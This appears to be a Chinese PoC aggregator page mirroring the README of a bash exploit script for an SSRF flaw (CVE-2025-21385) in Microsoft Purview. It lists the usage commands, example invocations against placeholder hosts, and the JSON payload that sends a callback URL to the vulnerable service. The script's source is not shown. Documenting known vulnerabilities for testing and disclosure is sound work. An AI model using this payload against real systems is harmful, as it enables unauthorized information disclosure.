POC详情: 64b1d210d649a1c5df5c2a56f745e91ece7ebdda

来源
https://github.com/Pauloxc6/CVE-2025-21385
关联漏洞
标题: Microsoft Purview 代码问题漏洞 (CVE-2025-21385)
描述:Microsoft Purview是美国微软(Microsoft)公司的一个数据安全和管理软件。 Microsoft Purview存在代码问题漏洞,该漏洞源于容易受到服务端请求伪造攻击,允许授权攻击者通过网络泄露信息。
描述
The SSRF vulnerability in Microsoft Purview
介绍
# SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**

## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.

## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)

## Usage

### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```

### Options
| Option             | Description                                      |
|--------------------|--------------------------------------------------|
| `-h`, `--help`     | Show the help menu.                             |
| `--exploit` `tu pu`| Perform the SSRF exploit with target and purview URLs. |

### Examples

#### Show Help Menu
```bash
./script.sh -h
```

Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```

#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```

Expected Output:
- If successful:
  ```
  SSRF exploit successful! Data retrieved:
  <response data>
  ```
- If unsuccessful:
  ```
  SSRF exploit failed! HTTP code: <code>
  ```

## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.

## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```

### Payload Sent
```json
{
  "callback": "http://callback-url.com"
}
```

### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.

## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.

## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

## Contribution
Feel free to contribute by creating pull requests or reporting issues.

## License
[GNU GPL v3](LICENSE)

---

### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.
文件快照

 [4.0K]  /data/pocs/64b1d210d649a1c5df5c2a56f745e91ece7ebdda
├── [2.2K]  CVE-2025-21385.sh
├── [ 34K]  LICENSE
└── [2.8K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。